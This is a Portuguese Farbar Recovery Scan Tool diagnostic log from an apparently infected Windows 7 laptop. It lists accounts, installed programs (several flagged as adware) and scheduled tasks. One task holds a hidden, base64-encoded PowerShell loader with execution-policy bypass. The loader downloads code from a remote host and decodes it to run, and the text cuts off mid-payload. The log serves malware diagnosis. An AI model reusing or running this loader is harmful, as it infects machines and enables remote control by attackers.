Publicité
Publicité
Format du document : text/plain
Prévisualisation
Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:17-02-2016
Executado por josejoo (2016-02-18 09:51:18)
Executando a partir de C:\Users\josejoo\Desktop
Windows 7 Professional Service Pack 1 (X64) (2015-09-07 23:34:33)
Modo da Inicialização: Normal
==========================================================
==================== Contas: =============================
Administrador (S-1-5-21-764792763-2688571116-1659716825-500 - Administrator - Disabled)
Convidado (S-1-5-21-764792763-2688571116-1659716825-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-764792763-2688571116-1659716825-1008 - Limited - Enabled)
joao (S-1-5-21-764792763-2688571116-1659716825-1010 - Limited - Enabled) => C:\Users\joao.josejoao-PC.000
josejoo (S-1-5-21-764792763-2688571116-1659716825-1007 - Administrator - Enabled) => C:\Users\josejoo
==================== Central de Segurança ========================
(Se uma entrada for incluída na fixlist, será removida.)
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: McAfee Firewall (Disabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D}
==================== Programas Instalados ======================
(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)
abMedia (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.09.2003.0 - Acer Incorporated)
abPhoto (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 3.06.2000.22 - Acer Incorporated)
Acer ePower Management (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 6.00.3010 - Acer Incorporated)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 5.00.3508 - Acer Incorporated)
Acer Games (HKLM-x32\...\WildTangent acer Master Uninstall) (Version: 1.0.2.5 - WildTangent)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 3.09.2002 - Acer Incorporated)
Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.04.3507 - Acer Incorporated)
Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.2003 - Acer Incorporated)
Adobe Reader XI (11.0.04) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.04 - Adobe Systems Incorporated)
Agatha Christie - Death on the Nile (x32 Version: 2.2.0.98 - WildTangent) Hidden
AOP Framework (HKLM-x32\...\{4A37A114-702F-4055-A4B6-16571D4A5353}) (Version: 3.15.2000.1 - Acer Incorporated)
aTube Catcher versão 3.8 (HKLM-x32\...\{D43B360E-722D-421B-BC77-20B9E0F8B6CD}_is1) (Version: 3.8 - DsNET Corp)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
BlueStacks App Player (HKLM-x32\...\{4047E0FE-CBD8-4915-BBB1-45F6CBF417AC}) (Version: 2.0.4.5627 - BlueStack Systems, Inc.)
Chromium (HKU\.DEFAULT\...\Chromium) (Version: 46.0.2480.0 - Chromium)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Evernote v. 4.5.2 (HKLM-x32\...\{F77EF646-19EB-11E1-9A9E-984BE15F174E}) (Version: 4.5.2.5866 - Evernote Corp.)
FATE (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive: Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Gameo (HKU\.DEFAULT\...\Gameo) (Version: 0.14.1 - IronSource Ltd.) <==== ATENÇÃO
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.109 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3503 - Acer Incorporated)
Insaniquarium Deluxe (x32 Version: 2.2.0.97 - WildTangent) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3383 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.1.41 - Intel Corporation)
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
McAfee LiveSafe – Internet Security (HKLM-x32\...\MSC) (Version: 14.0.4121 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.170 - McAfee, Inc.)
Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Mozilla Firefox 41.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 41.0.1 (x86 pt-BR)) (Version: 41.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.1.5750 - Mozilla)
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
PriceFountain (remove only) (HKU\.DEFAULT\...\PriceFountain) (Version: 1.2.9.6 - PBNGTBJJPYO) <==== ATENÇÃO
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.318 - Qualcomm Atheros Communications)
Qualcomm Atheros WLAN and Bluetooth Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 12.29 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.21257 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.88.617.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7300 - Realtek Semiconductor Corp.)
Slingo Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.6.21 - Synaptics Incorporated)
Tales of Lagoona (x32 Version: 2.2.0.98 - WildTangent) Hidden
Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden
Update for PriceFountain (HKU\.DEFAULT\...\Price Fountain) (Version: - Update for PriceFountain) <==== ATENÇÃO
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.97 - WildTangent) Hidden
Wedding Dash (x32 Version: 2.2.0.95 - WildTangent) Hidden
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.02.3507 - Acer Incorporated)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: 6.7.141 - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== ATENÇÃO
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {11C1BB2D-ABCF-47CB-87C2-632318010DEF} - System32\Tasks\Oelfiireaoiwi => C:\ProgramData\Oelfiireaoiwi\1.0.7.1\uheohnik.exe [2016-02-18] ()
Task: {43028A6D-616B-4C96-BA4F-5A69F0CFD4D1} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [2016-01-14] (Acer Incorporated)
Task: {4C42830B-AA07-45AE-A867-876E37385BF9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.)
Task: {4E3185D6-79DE-4121-8AF5-6B6D8ACE7283} - System32\Tasks\{D9CD2D34-2181-47F9-BBA9-B91F0372C472} => pcalua.exe -a C:\Users\josejoao\Downloads\OUTROS\JavaSetup8u60.exe -d C:\Users\josejoao\Downloads\OUTROS
Task: {63177D68-4652-47F8-AB29-1670BD5DEB4C} - \MPC AdCleaner -> Nenhum Arquivo <==== ATENÇÃO
Task: {74FF969F-A1D4-437C-AF17-30B0E05C71E3} - System32\Tasks\Launch Manager => C:\Program Files\Acer\Acer Launch Manager\LMLauncher.exe [2014-06-09] (Acer Incorporate)
Task: {78FFF65C-587A-4616-81A1-11BF6DA8DE14} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2016-01-19] (Acer)
Task: {A45F5DDC-4436-445A-BBD4-7119E793F921} - System32\Tasks\PFExe => C:\Windows\system32\config\systemprofile\AppData\Local\PriceFountain\pricefountain.exe <==== ATENÇÃO
Task: {B293D63D-EF51-470F-B1CE-86546EE9552C} - System32\Tasks\UALU notificatin => C:\Program Files\Acer\Acer Updater\UALU.exe [2012-04-05] (Acer Incorporated)
Task: {BA0A6938-AF9A-469C-8BA4-0939AE1760AB} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-09-09] ()
Task: {BA5DF0BD-50A7-40A9-B22A-85D17771E212} - System32\Tasks\{4C6887B2-54D6-447E-8B85-C47FA426E573} => pcalua.exe -a C:\Users\josejoao\AppData\Roaming\uTorrent\uTorrent.exe -c /UNINSTALL
Task: {CE3BE677-6922-44E7-B039-FDC7D2592DD5} - System32\Tasks\{050C7D47-090B-090C-0D11-0D7E7E79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAZQBhAHUAdAB5AGYAaQBsAGUALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEEAOQBiAHkAWQB5AFYANwAzAFEATQBlAGcANgBwAG4AYwBFAFIAbwA1AHIAbQBUAGEAagBLAHcAdQBjAE8AMwBiAEoAdwBEAHMAcwBPAC0ASQBNAFAAeABsAHgAMwAzAHEAVABMAGMAOQBvADQALQBPAGoANAB4AGIAdgBEAHcANQBhAGsALQBMAHgAQQBxAHEATQBoAFYAZgBMAHAAcAB6AEYAWABvAHYANwBJAEsALQBZADEAQgBuAFoAbwB1AG8AQQBZAHoAbABpAFkALQAtAHAASgBrAGMAeQBSAGUAUABUAGcAQwBqAHYAMgBKADUASwBNAGoAVABGAEcASQBfADgARAB4AFcAWgBMAEYANQBoADYAMABLAGoAMwBZAFEAVgBYAHgARwBvAE0AeABUAFkASwBlADcAZABTAHEAbAB1AFIAcgBMAEgAdABQAHYAUQBoAEoAdAB4AFEASgBiADMAVABOADUAYQBRAHAATgB2AE8AMwBGAEsARQBmAFMAeQB5AFcAcABzAFoAMwB6AFcAQgBHAFEAMwBrAE8AcwBIAHUAMQBNAE8AUABrAHUAdgBuADQATgBlADQANAB4AE8AMgBjAG4AbAB5AHgAQQA4AHkASABOAFcASwAyAHoAZwBnAHEAZwA4AHoAaABwAF8ASwBwAG8AYgBVAE0AaQBkAEoAZABOADkAWgBTAGYAWAB1AGcAdQB0AGsAZQBmAEoAcwA3AG0AbgBJAEMAawBZAGcATQBfAGcATwAwAC0ASgBRAHUAcABkAGMAbwBwAHMAUgB0ADMAYgA2AFoAOQBWAEEAWQBQAFUAawBHAEoAcgBmAG0AaQB3AE0AbwBWAGcAXwB2AGoAdQBtAFMAOQAtADUARABEAC0AZABqAEgAcABTAGMAZgA0AFEAcABqAGkAXwB4AG8AMgBsAHIANQB5AGMAcABwAGwAVABmAG8ATABzAGgAOAB6AFUAcAA3AHcAMQBZAGoANABBAEgAcABqAF8ATgBfAHkAdgBIAHAAbwBWAHEAdABUAG4AWABsAHMASgAtAGUANAA3AEcAMwBvAHEAQgB1AEYAZwBZAEEAbgBOADcAVQBvAEMANQBJAEQAOQA1ADYALQB3AFAAdwBnAFAAdgBwAGUAZQBNAEIAbwBsAEgAcwBnAGYASABNAFAARQBqAEoAZwB3AGwAYwA3AF8AcwB2AFkANAAxAGoAYQBvADYASABHAEoAWQBCAGcAYgBaADIAcgB2AEIAMQA3AEcAZgBxADkAawA4AHUAeQBZAEIAdABrAFkAMAAtAFQAYwB2ADUAYwA2AE4AWQBzAFgAaQBWAEUAUgBZAHkAagBFAGYAbgAwAHQAOABFAFUANwBPAEwAMgBpADcASABDAFkAUAAwAHAAMABvADUAdgB5AEkAaAA4AGoAYgBYADYAZwBSAEMAcwAwAEYAUQBTADYAdABtADkAVABSAEoAMwA1AF8AcABsAG0AUQBBAEgAbQBoAEIAVQBxAEkARQBOAFkAZQBvAGkAbgBSAGQATgBmAHMAdgA1AEQAZwBPAE8AUQBnAFUAWABEADIAQgBNADYAaABJAF8AWQA3AFQAUwA0ADYAVwB0AGcALQBlADUASgBjADcARABYAHEAUABTAGgAcAB5AFAARAB1AGoAZwBWAEsASQBrAEIAVwB1AGcASwBGAGoAMgA2AHQAQwBaAGYASwBZAE0AaABuAFAAbQBNAFUAVwBLAEUAegBHADMASgA1AGIAdgBKADEAXwBqAEwAdgBuAHAAOQBrADMATwBtADQAZQA5AHYAeQAwAHoATABLAFQAMwBkAEwAZABEAFAARAB6AGEAbAAwAHgANwBOAFgAVABrAGUAUQA5ADgATQBEAE0AdwBWAFkAMQB2AHMAVgB1AEMATABKAFkAOQBXAGkASQAyAGkAcwA1AFQAYgBDAGsANgBlAHkAVgA4AG4ATAA0ADMAZAAzAHgAQwB0ADEASABfAGUAXwAxAFkAVwBxAHIATAAxAEYATQBUAHkATwAzAFoAQwBwAEoAMgAwAGMARwBkADEAcAAxAGEAZgBKAG0AZQA1AGQATgBaAHoAMwBUAEEAaQBQAEoAcQBlAE8ASQBLAFYAVgBLAHMASwBxAHEATQBRAFQAdwA4AHQAbQAtAEkAZABmADUAYwB5AE4AZwB5AHIAbwBxAEYAWgBpAHMAOABnAGMANgBqAEYALQBiADIAZQBqAFkAMwBPAFQAdgB4AEgANwB2AFkAdABQAHoAQQAzAGcAbwBVAEMAawBUAHMAZQBGAFMAOQBsAC0ARwBZAHYAYgAwAF8AcgBaAGgAWQB6AHIAVwBoAFoAYQBZAHgAZQA1AEMAYgBFAHUASQBJAEkARgAmAGMAPQByADkAVQBNADMAeABrAHEAegB1AF8AUQBTADEAdQBsADYANABRAFoAZgBuADIAQwBhAG0ATQBIAEwAagBlAHEANQBRAHQARQBhAGIAUgBDAFQAcgBiAE0AcgBxAGoAVQBBAE8ANwBWAEYAYwAtADYAMQBZAFQAegBkAGUAYQB2AGwAYQBWAHAAZABSAFAAegA3AHgASAA5AEIASwBlAGcAdABUAEEATwA0ADAAcQBMAHgAUABEAGsAagBlAE8AWgByAFQAQgBfAGoAYwBzAC0AagBLADEAUwBkAFQAdABhAGQAcwBTAEEAcQBPAHIAYgBxAHYAeQAyAEgAMQBTAEgANQByAHYAVQA1AFIAMgBXAFMAbABNAF8ALQBlAGIAbABCAGwAVAB4AGcAVQBKAHAAZQBCAG8AeABSAEMAbgBJAHUAagBmAFgANwBSAHEAUQBPAF8ARgBmAHMAVgB3ADEAMgBtAEwAVQBUAGEARwBNADIARQBiAC0AVwBTAFYAaQBNAGwAdwA3AHEAWQBVAGkAUwB1ADkASQB0AGsAYQBFAHkAagBWAEgARgBkAEcAXwBGAEEAVwBLAHkAcgBnADkAXwB2AEgASABuAEUAeQB4AEcAcAByAFIAeAB2ADgAMwBCAEYASgBCAFAAdQAwAFEANwBfAHUAZgA4AFoASAAwADkAUQB4AE8AOAAwAEsAVQB3AGgAegBaADYALQBqAC0AZQBhAEYAVgBxAGEANgBtAGUAYwBCAGIAUgBvADAAWQByAEUASwB5AFQAQgBJAG8ANABaADkAUgBPAGEAbgB4AGwAcgBVADIAMAAwAGsASABqADUAVgA4AGsATQBwADMAcwBNAC0ALQBMAHUAUwAwAEwAcABtAGgATwBrAEYAcwBqAC0ATABKAEsANQBrAEkAVgBLAHgAMgA5AEEATgBjAHMAbABRAGkAbwBiAEwAawBvAEUAMgBTAG4AcwBzAGQAcQBkAEcAcQA2AHYASwBsAHIAZwBNAFUAVwB6AHUAUABOAGoAQwByAFoAOABhAFUASgB0AE8AXwBVAEkAUgBwADMAbQBhAG0ANQBuAGUAZwBUAEYARwBkADMAaABxAGMAdgBQADYAdABzAGcAQwBhAHQAcQAyAGkATwBUAFEAZwA0AC0AYgBjAFEATAA0AHQAcgBjAGkAQQBFAGIATQBTAHgATABFAGcANwBkAHgATABVAGgAbgA1AE8ASAB2AEgAdAB4AHIAcQBoAEQAUQBqAFUAegBBAE8ARABvAHAAYgB3AFUATgBYAE8AZABXADcAUABjAFQATAB3AEcAeABlAGMARQA4AFUARABfAFIAeAB1AGIATQA0AHgATgBpADAAUwBVAFEAdwBlADkATwBfAFMAawBWAEMARQAtAFcAZABUAHUAbQBBADIAZgBwAEUAeABhAGQAZwB0ADcAbQBqAGoANABrAC0AcgBjAGcAQgBuAGkAWABMAC0ALQBKAFIASQA5AGkAbgBNADAAcABFAC0ASgBPADIAVgBwAHIARwBaAEgAaQBPAGYAdwA5AEsATQBoAHYAdwBHAGUARgBrAGEAdQBzADQAbwBIAGoAYwA2AEQASABhAF8AVgB2AGYATABQAGQATwA0AEgAMgBzAFgAVwB5ADIAawBNADAAMgAzAGEARgBNAEkAdAA3AE4AWgB6AFYAVwBoAEkAdABsAGMAagBxAGoASgBNAGkARAA4AEwARQB5AEIAcwBZADcAZQA1AGcATwAyAEcASgBSAFEAOAB1AGEARABDAEkAcwBRAGsAVABfAFAARgBsAFYARQBHADEAegBVAFAAdQAtAFQAVQBLAFMAYgBrAEMAdQBRADAAMgBtAGIAdwBCAGgAcABJAGcAYwBmAHUAbwBSAEQATwBLADgAWgBfAFUAeQBEAHgAZwBXAEkAagBfAHgAVQBGAC0AdQB5AGkAcQBLAHoAbgBDAEYAagBRAFoAbgBwAGcAcgA3AGEARQBFAFkAVABoAFIAaQBZAEwAYwBEAFYATABXAFMALQBYAHEATAAtAHMAOQBuAE8ASgBFAEEAZwBoAGkAUgBpAEgAVgBOAFcAZgA0AGEATQBjAFYATQBtAFQANwA4AFAAVgBNAEwAcgBiAFkAZQBaADYAYQBhAFkAdQAyAE8ARwA4AGgAOABPAHMAQQBaADAAawB2AHYAbAB1AGsAVwB4AG8AWAB4ADQARgBYAFIANAByAGcAQQAyAG8AbwA0ADYANwBwAFoAQgBFAGEAMQA1AFQATwBkAFIAQgBDAHMAMQA5AEYARQBzAGEAUwBBAEcAMABTAHUASgA1AFUARQBzAEUARAAyAHEAOABIAEoAcQBSAGYALQBSAEcAVwAwAGQAeQB2AHYAUwBPAFcAcABfADEAbQBFAFoAVgA5AHkAdABsAHIAagBnAFkAdQBlADQASABuACYAcgA9ADQAMwA2ADAAMQA5ADQANAAzADMANAA5ADUANgA3ADQANwA2ADkAIgA7ACQAcwB0AHMAawA9ACIAewAwADUAMABDADcARAA0ADcALQAwADkAMABCAC0AMAA5ADAAQwAtADAARAAxADEALQAwAEQANwBFADcARQA3ADkAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFEAUABNAEYATwBMAFEARwAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvA